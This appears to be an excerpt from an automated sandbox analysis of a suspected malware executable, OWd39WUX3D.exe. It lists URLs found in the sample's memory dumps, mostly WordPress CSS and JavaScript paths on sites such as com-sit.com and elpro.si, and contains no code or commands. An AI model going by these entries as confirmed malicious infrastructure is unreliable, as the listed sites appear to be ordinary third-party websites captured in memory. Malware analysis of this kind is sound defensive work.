              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-638.css?ver=1694601225
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/premium-addons-elementor/pa-frontend-2947ecb72.min.css?ver
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/css/dist/block-library/style.min.css?ver=6.3.1
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/i18n.min.js?ver=7701b0c3857f914212ef
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.11
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.0
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.crrcgc.cc/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.00000000008FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dayvo.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.00000000008FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.00000000008FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/o
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/ajax-search-for-woocommerce-premium/assets/css/style.min.css?
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/ajax-search-for-woocommerce-premium/assets/js/search.min.js?v
